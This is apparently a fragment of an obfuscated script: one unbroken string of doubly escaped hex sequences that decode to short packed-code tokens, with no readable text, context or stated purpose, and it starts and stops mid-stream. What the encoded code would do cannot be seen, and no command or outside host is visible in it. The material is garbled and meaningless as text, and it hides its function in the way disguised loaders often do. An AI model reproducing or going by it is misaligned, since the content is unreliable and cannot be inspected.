5c\x55\x5c\x5c\x6d\x5c\x5c\x31\x6d\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x61\x5c\x5c\x62\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x50\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x52\x5c\x5c\x69\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x69\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x43\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x31\x32\x5c\x5c\x69\x5c\x5c\x52\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x31\x30\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x31\x6b\x5c\x5c\x69\x5c\x5c\x52\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x6f\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x7a\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x59\x5c\x5c\x69\x5c\x5c\x31\x6b\x5c\x5c\x31\x35\x5c\x5c\x4f\x5c\x5c\x31\x36\x5c\x5c\x42\x5c\x5c\x53\x5c\x5c\x62\x5c\x5c\x31\x32\x5c\x5c\x65\x5c\x5c\x5a\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x46\x5c\x5c\x4c\x5c\x5c\x6b\x5c\x5c\x31\x30\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x69\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x63\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x31\x61\x5c\x5c\x7a\x5c\x5c\x59\x5c\x5c\x7a\x5c\x5c\x63\x5c\x5c\x47\x5c\x5c\x59\x5c\x5c\x47\x5c\x5c\x63\x5c\x5c\x31\x6f\x5c\x5c\x31\x71\x5c\x5c\x64\x5c\x5c\x31\x66\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x59\x5c\x5c\x69\x5c\x5c\x63\x5c\x5c\x47\x5c\x5c\x68\x5c\x5c\x31\x78\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x49\x5c\x5c\x6b\x5c\x5c\x31\x30\x5c\x5c\x6b\x5c\x5c\x68\x5c\x5c\x75\x5c\x5c\x6e\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x4b\x5c\x5c\x6e\x5c\x5c\x65\x5c\x5c\x31\x30\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x6f\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x31\x65\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x75\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x31\x6e\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x58\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x46\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x75\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x31\x31\x5c\x5c\x6b\x5c\x5c\x31\x30\x5c\x5c\x6d\x5c\x5c\x31\x66\x5c\x5c\x6d\x5c\x5c\x31\x6d\x5c\x5c\x6d\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x6d\x5c\x5c\x6b\x5c\x5c\x68\x5c\x5c\x75\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x75\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x67\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x53\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x6c\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x31\x65\x5c\x5c\x6b\x5c\x5c\x31\x72\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x48\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x53\x5c\x5c\x62\x5c\x5c\x31\x75\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x6c\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x63\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x6c\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x62\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x63\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x31\x72\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x48\x5c\x5c\x6b\x5c\x5c\x31\x72\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x31\x6a\x5c\x5c\x78\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x6c\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x46\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x63\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x76\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x55\x5c\x5c\x6d\x5c\x5c\x65\x5c\x5c\x48\x5c\x5c\x6b\x5c\x5c\x31\x72\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x79\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x31\x63\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x61\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x75\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x64\x5c\x5c\x64\x5c\x5c\x46\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x61\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x4d\x5c\x5c\x62\x5c\x5c\x64\x5c\x5c\x31\x76\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x76\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x76\x5c\x5c\x50\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x74\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x48\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x61\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x75\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x64\x5c\x5c\x64\x5c\x5c\x46\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x61\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x74\x5c\x5c\x62\x5c\x5c\x64\x5c\x5c\x31\x76\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x76\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x76\x5c\x5c\x50\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x45\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x6e\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x41\x5c\x5c\x6b\x5c\x5c\x59\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x69\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x67\x5c\x5c\x6e\x5c\x5c\x41\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x31\x67\x5c\x5c\x6d\x5c\x5c\x41\x5c\x5c\x65\x5c\x5c\x31\x73\x5c\x5c\x62\x5c\x5c\x41\x5c\x5c\x6e\x5c\x5c\x41\x5c\x5c\x47\x5c\x5c\x63\x5c\x5c\x31\x6f\x5c\x5c\x31\x71\x5c\x5c\x64\x5c\x5c\x31\x66\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x59\x5c\x5c\x69\x5c\x5c\x63\x5c\x5c\x47\x5c\x5c\x68\x5c\x5c\x31\x78\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x31\x37\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x4d\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x53\x5c\x5c\x6d\x5c\x5c\x64\x5c\x5c\x4c\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x70\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x67\x5c\x5c\x6e\x5c\x5c\x6f\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x6f\x5c\x5c\x69\x5c\x5c\x6f\x5c\x5c\x65\x5c\x5c\x31\x73\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x73\x5c\x5c\x6b\x5c\x5c\x44\x5c\x5c\x7a\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x63\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x71\x5c\x5c\x6b\x5c\x5c\x44\x5c\x5c\x7a\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x6f\x5c\x5c\x69\x5c\x5c\x6f\x5c\x5c\x65\x5c\x5c\x31\x73\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x7a\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x6c\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x33\x5c\x5c\x65\x5c\x5c\x31\x33\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x4c\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x4a\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x52\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x63\x5c\x5c\x7a\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x68\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x6b\x5c\x5c\x65\x5c\x5c\x31\x33\x5c\x5c\x7a\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x31\x34\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x31\x38\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x4e\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x31\x77\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x51\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x5a\x5c\x5c\x6b\x5c\x5c\x73\x5c\x5c\x7a\x5c\x5c\x76\x5c\x5c\x31\x37\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x67\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x31\x67\x5c\x5c\x6d\x5c\x5c\x6f\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x31\x6d\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x57\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x61\x5c\x5c\x62\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x46\x5c\x5c\x31\x32\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x63\x5c\x5c\x46\x5c\x5c\x31\x31\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x46\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x61\x5c\x5c\x62\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x50\x5c\x5c\x6d\x5c\x5c\x44\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x31\x79\x5c\x5c\x6b\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x76\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x69\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x76\x5c\x5c\x31\x74\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x67\x5c\x5c\x6b\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x76\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x69\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x78\x5c\x5c\x64\x5c\x5c\x31\x78\x5c\x5c\x56\x5c\x5c\x44\x5c\x5c\x6e\x5c\x5c\x31\x32\x5c\x5c\x56\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x45\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x68\x5c\x5c\x53\x5c\x5c\x56\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x67\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x50\x5c\x5c\x6d\x5c\x5c\x41\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x67\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x76\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x73\x5c\x5c\x6b\x5c\x5c\x4e\x5c\x5c\x6d\x5c\x5c\x76\x5c\x5c\x41\x5c\x5c\x65\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x74\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x52\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x76\x5c\x5c\x31\x79\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x6d\x5c\x5c\x65\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x46\x5c\x5c\x6b\x5c\x5c\x76\x5c\x5c\x44\x5c\x5c\x6d\x5c\x5c\x45\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x52\x5c\x5c\x62\x5c\x5c\x41\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x78\x5c\x5c\x64\x5c\x5c\x31\x78\x5c\x5c\x56\x5c\x5c\x76\x5c\x5c\x31\x74\x5c\x5c\x6e\x5c\x5c\x31\x32\x5c\x5c\x56\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x45\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x68\x5c\x5c\x53\x5c\x5c\x56\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x67\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x50\x5c\x5c\x6d\x5c\x5c\x41\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x67\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x76\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x73\x5c\x5c\x6b\x5c\x5c\x4e\x5c\x5c\x6d\x5c\x5c\x76\x5c\x5c\x41\x5c\x5c\x65\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x74\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x52\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x76\x5c\x5c\x67\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x6d\x5c\x5c\x65\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x46\x5c\x5c\x6b\x5c\x5c\x76\x5c\x5c\x44\x5c\x5c\x6d\x5c\x5c\x45\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x52\x5c\x5c\x62\x5c\x5c\x41\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x65\x5c\x5c\x4e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x6e\x5c\x5c\x6d\x5c\x5c\x46\x5c\x5c\x31\x30\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x61\x5c\x5c\x62\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x50\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x31\x32\x5c\x5c\x69\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x52\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x53\x5c\x5c\x62\x5c\x5c\x31\x32\x5c\x5c\x65\x5c\x5c\x5a\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x71\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x48\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x54\x5c\x5c\x64\x5c\x5c\x67\x5c\x5c\x55\x5c\x5c\x65\x5c\x5c\x31\x78\x5c\x5c\x6d\x5c\x5c\x31\x64\x5c\x5c\x31\x6e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x37\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x4f\x5c\x5c\x56\x5c\x5c\x68\x5c\x5c\x4a\x5c\x5c\x79\x5c\x5c\x65\x5c\x5c\x31\x78\x5c\x5c\x6d\x5c\x5c\x31\x64\x5c\x5c\x64\x5c\x5c\x48\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x37\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x4f\x5c\x5c\x56\x5c\x5c\x68\x5c\x5c\x71\x5c\x5c\x79\x5c\x5c\x54\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x67\x5c\x5c\x55\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x53\x5c\x5c\x62\x5c\x5c\x31\x32\x5c\x5c\x65\x5c\x5c\x5a\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x4a\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x48\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x54\x5c\x5c\x64\x5c\x5c\x67\x5c\x5c\x55\x5c\x5c\x65\x5c\x5c\x31\x78\x5c\x5c\x6d\x5c\x5c\x31\x64\x5c\x5c\x31\x6e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x37\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x4f\x5c\x5c\x56\x5c\x5c\x68\x5c\x5c\x71\x5c\x5c\x79\x5c\x5c\x65\x5c\x5c\x31\x78\x5c\x5c\x6d\x5c\x5c\x31\x64\x5c\x5c\x64\x5c\x5c\x48\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x37\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x4f\x5c\x5c\x56\x5c\x5c\x68\x5c\x5c\x4a\x5c\x5c\x79\x5c\x5c\x54\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x67\x5c\x5c\x55\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x53\x5c\x5c\x62\x5c\x5c\x31\x32\x5c\x5c\x65\x5c\x5c\x5a\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x46\x5c\x5c\x31\x61\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x4e\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x54\x5c\x5c\x64\x5c\x5c\x67\x5c\x5c\x55\x5c\x5c\x65\x5c\x5c\x31\x78\x5c\x5c\x6d\x5c\x5c\x31\x64\x5c\x5c\x31\x6e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x37\x5c\x5c\x78\x5c\x5c\x64\x5c\x5c\x4e\x5c\x5c\x56\x5c\x5c\x68\x5c\x5c\x52\x5c\x5c\x31\x4d\x5c\x5c\x79\x5c\x5c\x65\x5c\x5c\x31\x78\x5c\x5c\x6d\x5c\x5c\x31\x64\x5c\x5c\x64\x5c\x5c\x48\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x37\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x31\x66\x5c\x5c\x56\x5c\x5c\x46\x5c\x5c\x31\x66\x5c\x5c\x79\x5c\x5c\x54\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x67\x5c\x5c\x55\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x64\x5c\x5c\x31\x6e\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x37\x5c\x5c\x6e\x5c\x5c\x6d\x5c\x5c\x31\x64\x5c\x5c\x64\x5c\x5c\x48\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x37\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x61\x5c\x5c\x62\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x53\x5c\x5c\x62\x5c\x5c\x46\x5c\x5c\x59\x5c\x5c\x69\x5c\x5c\x69\x5c\x5c\x76\x5c\x5c\x43\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x31\x6a\x5c\x5c\x62\x5c\x5c\x78\x5c\x5c\x46\x5c\x5c\x31\x69\x5c\x5c\x56\x5c\x5c\x76\x5c\x5c\x4f\x5c\x5c\x6e\x5c\x5c\x46\x5c\x5c\x31\x33\x5c\x5c\x56\x5c\x5c\x76\x5c\x5c\x4f\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x64\x5c\x5c\x68\x5c\x5c\x31\x34\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x6a\x5c\x5c\x6d\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x31\x32\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x31\x69\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x61\x5c\x5c\x62\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x50\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x52\x5c\x5c\x69\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x52\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x43\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x31\x32\x5c\x5c\x69\x5c\x5c\x52\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x31\x30\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x31\x6b\x5c\x5c\x69\x5c\x5c\x52\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x6f\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x7a\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x68